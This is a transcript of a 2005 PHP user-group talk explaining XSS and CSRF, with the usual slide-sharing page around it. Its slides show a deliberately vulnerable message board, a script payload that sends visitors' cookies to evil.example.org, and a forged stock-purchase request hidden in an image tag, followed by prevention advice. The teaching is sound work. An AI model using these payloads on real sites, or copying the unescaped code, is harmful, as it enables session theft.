Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSS and CSRF: Programmers Prepare, Users Beware (Atlanta PHP July 2005)

Ben Ramsey
PRO
July 07, 2005
Programming
0
130

XSS and CSRF: Programmers Prepare, Users Beware (Atlanta PHP July 2005)

Cross-site scripting (XSS) and cross-site request forgeries (CSRF) are often confused as being one and the same, but this misconception can lead to disastrous results. In this talk, you will encounter each of these attacks through examples and learn to distinguish between them. You will also examine secure coding practices and techniques for prevention.

Ben Ramsey
PRO

July 07, 2005
Tweet

More Decks by Ben Ramsey

See All by Ben Ramsey
Internationalization & Localization With PHP (Longhorn PHP 2023)
ramsey
PRO
0
150
Let's Build a Composer Package (Longhorn PHP 2023)
ramsey
PRO
0
150
Put a UUID On It! (php[tek] 2023)
ramsey
PRO
0
140
Cool Tools for PHP Development (php[tek] 2023)
ramsey
PRO
0
180
Cool Tools for PHP Development (Nashville PHP April 2023)
ramsey
PRO
0
17
Cool Tools for PHP Development (MergePHP January 2022)
ramsey
PRO
1
440
Cool Tools for PHP Development (php[MiNDS] August 2021)
ramsey
PRO
0
62
Cool Tools for PHP Development (Essex Web July 2021)
ramsey
PRO
0
41
Cool Tools for PHP Development (PHPUGMRN June 2021)
ramsey
PRO
0
770

Other Decks in Programming

See All in Programming
1BRC--Nerd Sniping the Java Community
gunnarmorling
0
300
educure_カリキュラム生操作マニュアル.pdf
linew_official
0
480
Folding Cheat Sheet #1
philipschwarz
PRO
0
210
VSCodeでのDatabricks開発もお勧めしたい/I would also recommend Databricks development with VSCode.
kazumain
0
240
Designing for tomorrow's programming workflows
honnibal
PRO
2
110
What We Can Learn From OSS
inouehi
0
400
#phpcon_odawara オープン・クローズドなテストフィクスチャを求めて / open closed test fixtures
77web
3
220
入門 AWS Amplify Gen2 / Introduction to AWS Amplify Gen2
genkiogasawara
1
310
今、知っておきたい! 生成AIエージェントの世界
elith
3
340
Rubyでたのしむクリエイティブコーディング/Enjoy Creative coding with Ruby
chobishiba
1
160
スクラムチームと認知負荷 - ニフティのスクラムトーク Vol2. / NIFTY Tech Talk #18
niftycorp
PRO
1
120
Front-end application development, Symfony-style(s)
dunglas
2
1.9k

Featured

See All Featured
We Have a Design System, Now What?
morganepeng
42
6.7k
Designing the Hi-DPI Web
ddemaree
276
33k
Put a Button on it: Removing Barriers to Going Fast.
kastner
58
3k
A Philosophy of Restraint
colly
196
16k
Building Better People: How to give real-time feedback that sticks.
wjessup
354
18k
KATA
mclloyd
14
12k
Designing Experiences People Love
moore
136
23k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
240
1.2M
Why Our Code Smells
bkeepers
PRO
331
56k
The Brand Is Dead. Long Live the Brand.
mthomps
48
28k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
226
51k
Large-scale JavaScript Application Architecture
addyosmani
503
110k

Transcript

  1. Ben Ramsey Atlanta PHP 7 July 2005 1 XSS &

    CSRF Programmers Prepare, Users Beware

  2. Overview ‣ Cross-site Scripting (XSS) ‣ Cross-site Request Forgeries (CSRF)

    ‣ Questions 2

  3. XSS (Cross-site Scripting) ‣ Exploits user/browser trust in a Web

    site ‣ Generally involve sites that display foreign data (forums, Web mail clients, RSS feed readers) ‣ Inject content of attacker’s choosing ‣ Intent is to gain user information ‣ Attack is not “personal” 3

  4. Typical XSS Process ‣ Naughty user visits vulnerable site ‣

    Naughty user exploits the vulnerable site by posting Javascript code to the site ‣ Code posted usually sends information to another site (hence the term “cross-site”) ‣ Nice user visits the vulnerable site ‣ Nice user loads page with bad code (unknowingly) and runs the code ‣ Nice user unknowingly sends sensitive information to naughty user 4

  5. Message Board 5 <form method="POST"> <input type="text" name="message"/><br/> <input type="submit"/>

    </form> <!-- continued . . . -->

  6. Message Board 6 <?php if (isset($_POST['message'])) { file_put_contents('board.txt', "{$_POST['message']}<hr/>", FILE_APPEND);

    } $messages = file_get_contents('board.txt'); echo $messages; ?>

  7. Message Board ‣ Imagine what happens when a the naughty

    user enters: <script>document.location = 'http:// evil.example.org/steal_cookies.php? cookies=' + document.cookie</script> ‣ Now, all cookies from the nice user will be stolen when this page is accessed 7

  8. Preventing XSS ‣ Filter all incoming data -- ensure that

    input received is input expected ‣ Use a whitelist approach ‣ Use a strict naming convention ‣ Use existing PHP functions to escape data on output 8

  9. Safer Message Board 9 <?php if (isset($_POST['message'])) { file_put_contents('board.txt', "{$_POST['message']}<hr/>",

    FILE_APPEND); } $messages = file_get_contents('board.txt'); echo htmlentities($messages); ?>

  10. CSRF (Cross-site Request Forgeries) ‣ Exploits a Web site’s trust

    in the user/ browser ‣ Generally involve Web sites that rely on the identity of the users ‣ Perform HTTP requests of the attacker’s choosing ‣ Intent is to trick a user into performing an HTTP request/action ‣ Attack is not “personal” 10

  11. Typical CSRF Process ‣ Naughty user visits vulnerable site ‣

    Naughty user exploits the vulnerable site by posting an IMG tag or other code that sends an HTTP request ‣ Code posted usually causes a request to be made to another site (hence the term “cross- site”) ‣ Nice user visits the vulnerable site ‣ Nice user loads page with bad code ‣ Nice user unknowingly causes an HTTP request to be sent 11

  12. Quick look at HTTP ‣ Question: You load up a

    page in a Web browser that has three images on it and a LINK tag for a CSS file. How many HTTP requests were made? ‣ Answer: Five 12

  13. Quick look at HTTP 13 GET / HTTP/1.1 Host: example.org

    User-Agent: Mozilla/5.0 Gecko Accept: text/xml, image/png, image/jpeg, image/gif, */* HTTP/1.1 200 OK Content-Type: text/html Content-Length: 57 <html> <img src="http://example.org/image.png" /> </html>

  14. Quick look at HTTP 14 GET /image.png HTTP/1.1 Host: example.org

    Accept: text/xml, image/png, image/jpeg, image/gif, */*

  15. Quick look at HTTP ‣ Browsers do not restrict the

    IMG tag to specific image types ‣ IMG tag could point to a page instead of an image ‣ Consider the following URL: http://stocks.example.org/stocks.php? symbol=IBM&shares=40 ‣ CSRF makes use of local cookies to exploit the trust of the Web site in the user 15

  16. Quick look at HTTP 16 GET /stocks.php?symbol=IBM&shares=40 HTTP/1.1 Host: stocks.example.org

    Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=1234567890

  17. Preventing CSRF ‣ Use POST rather than GET in forms

    ‣ Use $_POST rather than rely on register_globals; turn off register_globals ‣ Do not focus on convenience ‣ Force the use of your own forms 17

  18. For more information... ‣ My Web site: http://benramsey.com ‣ PHP

    Security Consortium: http://phpsec.org Questions? 18